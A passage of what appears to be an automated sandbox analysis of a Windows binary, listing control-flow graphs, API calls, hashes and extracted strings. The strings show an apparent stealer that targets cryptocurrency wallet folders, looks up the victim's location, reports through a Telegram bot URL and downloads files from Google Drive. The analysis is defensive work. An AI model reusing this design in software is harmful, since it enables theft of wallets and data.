7ff7abc14723-7ff7abc14743 call 7ff7abc38de0 4483->4492 4489 7ff7abc146c9-7ff7abc146dc 4484->4489 4490 7ff7abc146e2-7ff7abc146e7 call 7ff7abc42790 4484->4490 4486->4323 4486->4487 4487->4481 4489->4332 4489->4490 4490->4483 4495 7ff7abc1471e call 7ff7abc42790 4491->4495 4496 7ff7abc14705-7ff7abc14718 4491->4496 4501 7ff7abc1476e-7ff7abc1477e call 7ff7abc38de0 4492->4501 4502 7ff7abc14745-7ff7abc1476d call 7ff7abc42a74 call 7ff7abc42790 4492->4502 4495->4492 4496->4342 4496->4495 4508 7ff7abc147a9-7ff7abc147b1 4501->4508 4509 7ff7abc14780-7ff7abc147a8 call 7ff7abc42a74 call 7ff7abc42790 4501->4509 4502->4501 4512 7ff7abc147b3-7ff7abc147c4 4508->4512 4513 7ff7abc147e4-7ff7abc14807 call 7ff7abc38de0 4508->4513 4509->4508 4516 7ff7abc147df call 7ff7abc42790 4512->4516 4517 7ff7abc147c6-7ff7abc147d9 4512->4517 4521 7ff7abc14809-7ff7abc14831 call 7ff7abc42a74 call 7ff7abc42790 4513->4521 4522 7ff7abc14832-7ff7abc14848 call 7ff7abc38de0 4513->4522 4516->4513 4517->4351 4517->4516 4521->4522 4529 7ff7abc1484a-7ff7abc14872 call 7ff7abc42a74 call 7ff7abc42790 4522->4529 4530 7ff7abc14873-7ff7abc1487b 4522->4530 4529->4530 4531 7ff7abc1487d-7ff7abc1488e 4530->4531 4532 7ff7abc148ae-7ff7abc148d4 call 7ff7abc38de0 4530->4532 4535 7ff7abc148a9 call 7ff7abc42790 4531->4535 4536 7ff7abc14890-7ff7abc148a3 4531->4536 4543 7ff7abc148ff-7ff7abc14915 call 7ff7abc38de0 4532->4543 4544 7ff7abc148d6-7ff7abc148fe call 7ff7abc42a74 call 7ff7abc42790 4532->4544 4535->4532 4536->4358 4536->4535 4549 7ff7abc14917-7ff7abc1493a call 7ff7abc42a74 call 7ff7abc42790 4543->4549 4550 7ff7abc1493f-7ff7abc14972 call 7ff7abc1f4e0 * 2 4543->4550 4544->4543 4549->4550 4560 7ff7abc149a8-7ff7abc149e5 call 7ff7abc38de0 4550->4560 4561 7ff7abc14974-7ff7abc14988 4550->4561 4567 7ff7abc149e7-7ff7abc14a0f call 7ff7abc42a74 call 7ff7abc42790 4560->4567 4568 7ff7abc14a10-7ff7abc14a1c 4560->4568 4563 7ff7abc1498a-7ff7abc1499d 4561->4563 4564 7ff7abc149a3 call 7ff7abc42790 4561->4564 4563->4367 4563->4564 4564->4560 4567->4568 4568->4362 4570 7ff7abc14a1e-7ff7abc14a21 4568->4570 4572 7ff7abc14a2c-7ff7abc14a36 4570->4572 4573 7ff7abc14a23-7ff7abc14a26 4570->4573 4572->4365 4575 7ff7abc14a38-7ff7abc14a50 call 7ff7abc3a060 call 7ff7abc42790 4572->4575 4573->4365 4573->4572 4575->4365
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseHandle$FileOpenRead
                                                                                                                                                                          • String ID: Could not fetch IP$Error parsing JSON response: $IPInfoFetcher$InternetOpen failed.$InternetOpenUrl failed.$Location not available$N/A$city$country$https://ipinfo.io/json$region
                                                                                                                                                                          • API String ID: 427349759-3899726476
                                                                                                                                                                          • Opcode ID: e5f0cd9ad887f1bff8791332fe58ff332ab910a150e907871e22586303550f00
                                                                                                                                                                          • Instruction ID: 475da2825f68a3ea55b0d70f22407c37c97e07e8c438ab6c0226b447bb3be2fb
                                                                                                                                                                          • Opcode Fuzzy Hash: e5f0cd9ad887f1bff8791332fe58ff332ab910a150e907871e22586303550f00
                                                                                                                                                                          • Instruction Fuzzy Hash: 0092C632A167C245EB20EF28D854BEDA351EB85798F815631DA5D1BAFADF3CD244C320
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisCreateFileInitializeInstance
                                                                                                                                                                          • String ID: does not exist or is not accessible.$C:\Users$Failed to create ShellLink COM object.$Failed to get IPersistFile interface.$Failed to save shortcut file.$The directory $User: $directory_entry::status$directory_iterator::directory_iterator$exists$status
                                                                                                                                                                          • API String ID: 2171753736-278810226
                                                                                                                                                                          • Opcode ID: 4714100c39652c6780bc2cec19bb84f0fb8848c9b67a89fbf350328451bfeb0b
                                                                                                                                                                          • Instruction ID: efbcaa1bb515e549a1cceb8b5ce2baebdc1ce7166b0be630ef64354a0755aa54
                                                                                                                                                                          • Opcode Fuzzy Hash: 4714100c39652c6780bc2cec19bb84f0fb8848c9b67a89fbf350328451bfeb0b
                                                                                                                                                                          • Instruction Fuzzy Hash: F172D462F16B4285EB10AB69D4446BDA761FB84BA4F818632DE5C17BF9DF3CE580C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$FileFind$CloseConcurrency::cancel_current_taskDeleteEnvironmentFirstNextVariable
                                                                                                                                                                          • String ID: .lnk$C:\Users\$Deleted: $Error finding user directories$Failed to delete: $USERPROFILE$\Desktop$directory_entry::status$directory_iterator::directory_iterator$exists
                                                                                                                                                                          • API String ID: 1014275803-3111992417
                                                                                                                                                                          • Opcode ID: cc9a03327077175d19d1366ffedd642dcfda8266f1f419181d5486607274d4fb
                                                                                                                                                                          • Instruction ID: 9a64f025e5cd94a01c3eb1630ffd317871aba9bc142dd78a4aba23b31a2a4287
                                                                                                                                                                          • Opcode Fuzzy Hash: cc9a03327077175d19d1366ffedd642dcfda8266f1f419181d5486607274d4fb
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D72B672A197C681EA20AB1DE4447BEE361FB85BA4F814231EAAD036F5DF7CD584C710

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 5151 7ff7abc14d20-7ff7abc14d90 call 7ff7abc43600 InternetOpenA 5154 7ff7abc14e2b-7ff7abc14e47 5151->5154 5155 7ff7abc14d96-7ff7abc14dc5 call 7ff7abc244a0 5151->5155 5156 7ff7abc14e49-7ff7abc14e4f 5154->5156 5157 7ff7abc14e51 5154->5157 5163 7ff7abc14dc7-7ff7abc14dd9 5155->5163 5164 7ff7abc14df9-7ff7abc14e2a call 7ff7abc42770 5155->5164 5159 7ff7abc14e54-7ff7abc14e61 5156->5159 5157->5159 5161 7ff7abc14e67 5159->5161 5162 7ff7abc14f08-7ff7abc14f1d 5159->5162 5166 7ff7abc14e70-7ff7abc14e7d call 7ff7abc49430 5161->5166 5167 7ff7abc1541a-7ff7abc1541f call 7ff7abc02410 5162->5167 5168 7ff7abc14f23-7ff7abc14f28 5162->5168 5169 7ff7abc14ddb-7ff7abc14dee 5163->5169 5170 7ff7abc14df4 call 7ff7abc42790 5163->5170 5184 7ff7abc14e7f-7ff7abc14e8a 5166->5184 5185 7ff7abc14ec2-7ff7abc14ede call 7ff7abc02210 5166->5185 5183 7ff7abc15420-7ff7abc15425 call 7ff7abc4cd30 5167->5183 5174 7ff7abc14f2a 5168->5174 5175 7ff7abc14f2d-7ff7abc14fa1 call 7ff7abc260e0 call 7ff7abc208c0 5168->5175 5169->5170 5176 7ff7abc15414-7ff7abc15419 call 7ff7abc4cd30 5169->5176 5170->5164 5174->5175 5200 7ff7abc14fa3 5175->5200 5201 7ff7abc14fa6-7ff7abc150b6 call 7ff7abc208c0 * 4 5175->5201 5176->5167 5198 7ff7abc15426-7ff7abc1542b call 7ff7abc4cd30 5183->5198 5189 7ff7abc14eab-7ff7abc14ec0 call 7ff7abc248f0 5184->5189 5190 7ff7abc14e8c-7ff7abc14ea9 5184->5190 5197 7ff7abc14ee5-7ff7abc14eed 5185->5197 5194 7ff7abc14efc-7ff7abc14f02 5189->5194 5190->5194 5194->5162 5194->5166 5197->5197 5203 7ff7abc14eef-7ff7abc14ef7 call 7ff7abc208c0 5197->5203 5209 7ff7abc1542c-7ff7abc15431 call 7ff7abc4cd30 5198->5209 5200->5201 5221 7ff7abc150b8-7ff7abc150c9 5201->5221 5222 7ff7abc150e9-7ff7abc15102 5201->5222 5203->5194 5214 7ff7abc15432-7ff7abc15437 call 7ff7abc4cd30 5209->5214 5220 7ff7abc15438-7ff7abc1543d call 7ff7abc4cd30 5214->5220 5239 7ff7abc1543e-7ff7abc15443 call 7ff7abc4cd30 5220->5239 5224 7ff7abc150cb-7ff7abc150de 5221->5224 5225 7ff7abc150e4 call 7ff7abc42790 5221->5225 5226 7ff7abc15104-7ff7abc15115 5222->5226 5227 7ff7abc15135-7ff7abc15146 5222->5227 5224->5183 5224->5225 5225->5222 5232 7ff7abc15117-7ff7abc1512a 5226->5232 5233 7ff7abc15130 call 7ff7abc42790 5226->5233 5228 7ff7abc15148-7ff7abc15159 5227->5228 5229 7ff7abc15179-7ff7abc1518b 5227->5229 5235 7ff7abc1515b-7ff7abc1516e 5228->5235 5236 7ff7abc15174 call 7ff7abc42790 5228->5236 5237 7ff7abc1518d-7ff7abc1519f 5229->5237 5238 7ff7abc151bf-7ff7abc151d2 5229->5238 5232->5198 5232->5233 5233->5227 5235->5209 5235->5236 5236->5229 5241 7ff7abc151ba call 7ff7abc42790 5237->5241 5242 7ff7abc151a1-7ff7abc151b4 5237->5242 5244 7ff7abc151d4-7ff7abc151e5 5238->5244 5245 7ff7abc15205-7ff7abc1523e InternetOpenUrlA 5238->5245 5255 7ff7abc15444-7ff7abc15449 call 7ff7abc428a0 5239->5255 5241->5238 5242->5214 5242->5241 5250 7ff7abc151e7-7ff7abc151fa 5244->5250 5251 7ff7abc15200 call 7ff7abc42790 5244->5251 5246 7ff7abc1531f-7ff7abc15351 call 7ff7abc244a0 5245->5246 5247 7ff7abc15244-7ff7abc1525d InternetReadFile 5245->5247 5260 7ff7abc15385-7ff7abc15397 InternetCloseHandle 5246->5260 5261 7ff7abc15353-7ff7abc15365 5246->5261 5253 7ff7abc15263-7ff7abc15268 5247->5253 5254 7ff7abc15314-7ff7abc1531d InternetCloseHandle 5247->5254 5250->5220 5250->5251 5251->5245 5253->5254 5258 7ff7abc1526e-7ff7abc15274 5253->5258 5254->5260 5272 7ff7abc1544a-7ff7abc1544f call 7ff7abc4cd30 5255->5272 5258->5255 5262 7ff7abc1527a-7ff7abc1529c 5258->5262 5263 7ff7abc15399-7ff7abc153aa 5260->5263 5264 7ff7abc153c6-7ff7abc153d7 5260->5264 5266 7ff7abc15367-7ff7abc1537a 5261->5266 5267 7ff7abc15380 call 7ff7abc42790 5261->5267 5268 7ff7abc152a0-7ff7abc152a8 5262->5268 5269 7ff7abc153ac-7ff7abc153bf 5263->5269 5270 7ff7abc153c1 call 7ff7abc42790 5263->5270 5264->5164 5271 7ff7abc153dd-7ff7abc153ee 5264->5271 5266->5267 5266->5272 5267->5260 5268->5268 5274 7ff7abc152aa-7ff7abc152c1 call 7ff7abc244a0 5268->5274 5269->5270 5275 7ff7abc1540e-7ff7abc15413 call 7ff7abc4cd30 5269->5275 5270->5264 5271->5170 5277 7ff7abc153f4-7ff7abc15407 5271->5277 5285 7ff7abc152c3-7ff7abc152d5 5274->5285 5286 7ff7abc152f5-7ff7abc1530e InternetReadFile 5274->5286 5275->5176 5277->5176 5281 7ff7abc15409 5277->5281 5281->5170 5287 7ff7abc152d7-7ff7abc152ea 5285->5287 5288 7ff7abc152f0 call 7ff7abc42790 5285->5288 5286->5253 5286->5254 5287->5239 5287->5288 5288->5286
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseFileHandleOpenRead
                                                                                                                                                                          • String ID: %%%02X$&parse_mode=HTML$&text=$/sendMessage?chat_id=$InternetOpen failed.$InternetOpenUrl failed.$TelegramBot$https://api.telegram.org/bot
                                                                                                                                                                          • API String ID: 490362910-2071712312
                                                                                                                                                                          • Opcode ID: 2116c08122732905607294f5540b89ffce0c194dcefc27091b70f05a335ee373
                                                                                                                                                                          • Instruction ID: 8d9b1aa6cd4c2b2531630d9d16c2aa6e5696832b9ab52b8d9849ae09778f5990
                                                                                                                                                                          • Opcode Fuzzy Hash: 2116c08122732905607294f5540b89ffce0c194dcefc27091b70f05a335ee373
                                                                                                                                                                          • Instruction Fuzzy Hash: 5212F862E15B8146FB00EB38E4447BDA761FB957A8F915331EA6C16AF6DF78E180C310

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 5290 7ff7abc06190-7ff7abc061ec call 7ff7abc43600 5293 7ff7abc061f2-7ff7abc06200 5290->5293 5294 7ff7abc062f7-7ff7abc062fe 5290->5294 5297 7ff7abc06206-7ff7abc0620b 5293->5297 5298 7ff7abc06757-7ff7abc0675c call 7ff7abc02410 5293->5298 5295 7ff7abc06300-7ff7abc06309 5294->5295 5296 7ff7abc0631a-7ff7abc06328 5294->5296 5299 7ff7abc0630e-7ff7abc06315 call 7ff7abc206d0 5295->5299 5300 7ff7abc0630b 5295->5300 5301 7ff7abc06751-7ff7abc06756 call 7ff7abc02410 5296->5301 5302 7ff7abc0632e-7ff7abc06368 call 7ff7abc260e0 5296->5302 5304 7ff7abc06210-7ff7abc06274 call 7ff7abc260e0 call 7ff7abc208c0 5297->5304 5305 7ff7abc0620d 5297->5305 5314 7ff7abc0675d-7ff7abc06762 call 7ff7abc4cd30 5298->5314 5299->5296 5300->5299 5301->5298 5316 7ff7abc0639c-7ff7abc063aa 5302->5316 5317 7ff7abc0636a-7ff7abc0637c 5302->5317 5324 7ff7abc06276-7ff7abc06287 5304->5324 5325 7ff7abc062b1-7ff7abc062c1 5304->5325 5305->5304 5330 7ff7abc06763-7ff7abc06768 call 7ff7abc4cd30 5314->5330 5316->5301 5322 7ff7abc063b0-7ff7abc063b8 5316->5322 5320 7ff7abc0637e-7ff7abc06391 5317->5320 5321 7ff7abc06397 call 7ff7abc42790 5317->5321 5320->5321 5326 7ff7abc06769-7ff7abc0676f call 7ff7abc4cd30 5320->5326 5321->5316 5328 7ff7abc063bd-7ff7abc063e9 call 7ff7abc260e0 5322->5328 5329 7ff7abc063ba 5322->5329 5334 7ff7abc062a2-7ff7abc062ac call 7ff7abc42790 5324->5334 5335 7ff7abc06289-7ff7abc0629c 5324->5335 5325->5296 5336 7ff7abc062c3-7ff7abc062d5 5325->5336 5343 7ff7abc0641d-7ff7abc06440 InternetOpenA 5328->5343 5344 7ff7abc063eb-7ff7abc063fd 5328->5344 5329->5328 5330->5326 5334->5325 5335->5314 5335->5334 5341 7ff7abc062f0-7ff7abc062f5 call 7ff7abc42790 5336->5341 5342 7ff7abc062d7-7ff7abc062ea 5336->5342 5341->5296 5342->5330 5342->5341 5349 7ff7abc06442-7ff7abc06474 call 7ff7abc244a0 5343->5349 5350 7ff7abc064b1-7ff7abc064e1 InternetOpenUrlA 5343->5350 5347 7ff7abc063ff-7ff7abc06412 5344->5347 5348 7ff7abc06418 call 7ff7abc42790 5344->5348 5347->5326 5347->5348 5348->5343 5361 7ff7abc0647a-7ff7abc0648c 5349->5361 5362 7ff7abc066e9 5349->5362 5352 7ff7abc064e3-7ff7abc06515 call 7ff7abc244a0 5350->5352 5353 7ff7abc06552-7ff7abc0655a 5350->5353 5364 7ff7abc066e0-7ff7abc066e3 InternetCloseHandle 5352->5364 5365 7ff7abc0651b-7ff7abc0652d 5352->5365 5357 7ff7abc0655f-7ff7abc06571 call 7ff7abc49edc 5353->5357 5358 7ff7abc0655c 5353->5358 5375 7ff7abc06671-7ff7abc066a3 call 7ff7abc244a0 5357->5375 5376 7ff7abc06577-7ff7abc0657c 5357->5376 5358->5357 5366 7ff7abc0648e-7ff7abc064a1 5361->5366 5367 7ff7abc064a7-7ff7abc064ac call 7ff7abc42790 5361->5367 5368 7ff7abc066eb-7ff7abc066f3 5362->5368 5364->5362 5370 7ff7abc0652f-7ff7abc06542 5365->5370 5371 7ff7abc06548-7ff7abc0654d call 7ff7abc42790 5365->5371 5366->5326 5366->5367 5367->5362 5372 7ff7abc066f5-7ff7abc06706 5368->5372 5373 7ff7abc06722-7ff7abc0674a call 7ff7abc42770 5368->5373 5370->5326 5370->5371 5371->5364 5380 7ff7abc0671d call 7ff7abc42790 5372->5380 5381 7ff7abc06708-7ff7abc0671b 5372->5381 5392 7ff7abc066a5-7ff7abc066b7 5375->5392 5393 7ff7abc066d7-7ff7abc066da InternetCloseHandle 5375->5393 5376->5375 5383 7ff7abc06582-7ff7abc0659b InternetReadFile 5376->5383 5380->5373 5381->5380 5387 7ff7abc0674b-7ff7abc06750 call 7ff7abc4cd30 5381->5387 5389 7ff7abc0659d 5383->5389 5390 7ff7abc065d7-7ff7abc065db call 7ff7abc48fe0 5383->5390 5387->5301 5391 7ff7abc065a0-7ff7abc065a5 5389->5391 5400 7ff7abc065e0-7ff7abc065fd InternetCloseHandle * 2 5390->5400 5391->5390 5396 7ff7abc065a7-7ff7abc065d5 call 7ff7abc49c48 InternetReadFile 5391->5396 5397 7ff7abc066d2 call 7ff7abc42790 5392->5397 5398 7ff7abc066b9-7ff7abc066cc 5392->5398 5393->5364 5396->5390 5396->5391 5397->5393 5398->5326 5398->5397 5400->5301 5403 7ff7abc06603-7ff7abc06608 5400->5403 5405 7ff7abc0660d-7ff7abc06639 call 7ff7abc260e0 5403->5405 5406 7ff7abc0660a 5403->5406 5409 7ff7abc0666d-7ff7abc0666f 5405->5409 5410 7ff7abc0663b-7ff7abc0664d 5405->5410 5406->5405 5409->5368 5411 7ff7abc0664f-7ff7abc06662 5410->5411 5412 7ff7abc06668 call 7ff7abc42790 5410->5412 5411->5326 5411->5412 5412->5409
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$CloseHandle_invalid_parameter_noinfo_noreturn$FileOpenRead
                                                                                                                                                                          • String ID: &export=download$*$DST: $Failed to open file for writing.$File downloaded successfully and saved as $FileDownloader$InternetOpen failed.$InternetOpenUrl failed.$URL: $https://drive.google.com/uc?id=
                                                                                                                                                                          • API String ID: 1313048855-3858291459
                                                                                                                                                                          • Opcode ID: f90a2fdffaa1c6873038af76952001493e8ca45214174326fbfaffb7a70e20a2
                                                                                                                                                                          • Instruction ID: 290d259be959b0c2a5c53d03cde93ad5493d1cc5bf148331fb25cc81c586822a
                                                                                                                                                                          • Opcode Fuzzy Hash: f90a2fdffaa1c6873038af76952001493e8ca45214174326fbfaffb7a70e20a2
                                                                                                                                                                          • Instruction Fuzzy Hash: C4F1C462F19B4642EA10EF6CD444BBDA361FB857A4F914231EA6C06AF9DF7CE480D710

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • NetUserEnum.NETAPI32(?,?,?,?,?,00000000,?,00007FF7ABC093EA), ref: 00007FF7ABC08B31
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF7ABC093EA), ref: 00007FF7ABC08B92
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF7ABC093EA), ref: 00007FF7ABC08BE6
                                                                                                                                                                          • NetApiBufferFree.NETAPI32(?,?,?,?,?,00000000,?,00007FF7ABC093EA), ref: 00007FF7ABC08C72
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC08CB9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$BufferEnumFreeUser_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Atomic$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Program Files\Trezor Suite$C:\ProgramData\%s\exodus$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor$exists$status
                                                                                                                                                                          • API String ID: 3930398341-644159398
                                                                                                                                                                          • Opcode ID: bcadf20640420031074605f38039830a50cdc84bb0a0e0709c0706a48c0f022b
                                                                                                                                                                          • Instruction ID: b3a01631c52773731b9346765e21c3eb2535ab2558e61e7bd941347a8b8f8d33
                                                                                                                                                                          • Opcode Fuzzy Hash: bcadf20640420031074605f38039830a50cdc84bb0a0e0709c0706a48c0f022b
                                                                                                                                                                          • Instruction Fuzzy Hash: BA51C532B06B419AE710EF69E4806ADB7A5F748798F818235EE5D57BB8DF38D241C700

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 5706 7ff7abc3e440-7ff7abc3e480 5707 7ff7abc3e482-7ff7abc3e489 5706->5707 5708 7ff7abc3e495-7ff7abc3e49e 5706->5708 5707->5708 5709 7ff7abc3e48b-7ff7abc3e490 5707->5709 5710 7ff7abc3e4ba-7ff7abc3e4bc 5708->5710 5711 7ff7abc3e4a0-7ff7abc3e4a3 5708->5711 5712 7ff7abc3e714-7ff7abc3e73a call 7ff7abc42770 5709->5712 5714 7ff7abc3e712 5710->5714 5715 7ff7abc3e4c2-7ff7abc3e4c6 5710->5715 5711->5710 5713 7ff7abc3e4a5-7ff7abc3e4ad 5711->5713 5719 7ff7abc3e4af-7ff7abc3e4b1 5713->5719 5720 7ff7abc3e4b3-7ff7abc3e4b6 5713->5720 5714->5712 5716 7ff7abc3e59d-7ff7abc3e5c4 call 7ff7abc3e770 5715->5716 5717 7ff7abc3e4cc-7ff7abc3e4cf 5715->5717 5731 7ff7abc3e5e6-7ff7abc3e5ef 5716->5731 5732 7ff7abc3e5c6-7ff7abc3e5cf 5716->5732 5721 7ff7abc3e4d1-7ff7abc3e4d9 5717->5721 5722 7ff7abc3e4e3-7ff7abc3e4f5 GetFileAttributesExW 5717->5722 5719->5710 5719->5720 5720->5710 5721->5722 5725 7ff7abc3e4db-7ff7abc3e4dd 5721->5725 5726 7ff7abc3e548-7ff7abc3e557 5722->5726 5727 7ff7abc3e4f7-7ff7abc3e500 GetLastError 5722->5727 5725->5716 5725->5722 5730 7ff7abc3e55b-7ff7abc3e55d 5726->5730 5727->5712 5729 7ff7abc3e506-7ff7abc3e518 FindFirstFileW 5727->5729 5737 7ff7abc3e51a-7ff7abc3e520 GetLastError 5729->5737 5738 7ff7abc3e525-7ff7abc3e546 FindClose 5729->5738 5739 7ff7abc3e569-7ff7abc3e597 5730->5739 5740 7ff7abc3e55f-7ff7abc3e567 5730->5740 5735 7ff7abc3e5f5-7ff7abc3e60d GetFileInformationByHandleEx 5731->5735 5736 7ff7abc3e6a3-7ff7abc3e6ac 5731->5736 5733 7ff7abc3e5d1-7ff7abc3e5d9 CloseHandle 5732->5733 5734 7ff7abc3e5df-7ff7abc3e5e1 5732->5734 5733->5734 5741 7ff7abc3e755-7ff7abc3e75a call 7ff7abc51774 5733->5741 5734->5712 5744 7ff7abc3e60f-7ff7abc3e61b GetLastError 5735->5744 5745 7ff7abc3e635-7ff7abc3e64e 5735->5745 5742 7ff7abc3e6ae-7ff7abc3e6c2 GetFileInformationByHandleEx 5736->5742 5743 7ff7abc3e6fb-7ff7abc3e6fd 5736->5743 5737->5712 5738->5730 5739->5714 5739->5716 5740->5716 5740->5739 5762 7ff7abc3e75b-7ff7abc3e760 call 7ff7abc51774 5741->5762 5747 7ff7abc3e6e8-7ff7abc3e6f8 5742->5747 5748 7ff7abc3e6c4-7ff7abc3e6d0 GetLastError 5742->5748 5751 7ff7abc3e73b-7ff7abc3e73f 5743->5751 5752 7ff7abc3e6ff-7ff7abc3e703 5743->5752 5749 7ff7abc3e62e-7ff7abc3e630 5744->5749 5750 7ff7abc3e61d-7ff7abc3e628 CloseHandle 5744->5750 5745->5736 5753 7ff7abc3e650-7ff7abc3e654 5745->5753 5747->5743 5748->5749 5755 7ff7abc3e6d6-7ff7abc3e6e1 CloseHandle 5748->5755 5749->5712 5750->5749 5756 7ff7abc3e767-7ff7abc3e76f call 7ff7abc51774 5750->5756 5760 7ff7abc3e74e-7ff7abc3e753 5751->5760 5761 7ff7abc3e741-7ff7abc3e74c CloseHandle 5751->5761 5752->5714 5757 7ff7abc3e705-7ff7abc3e710 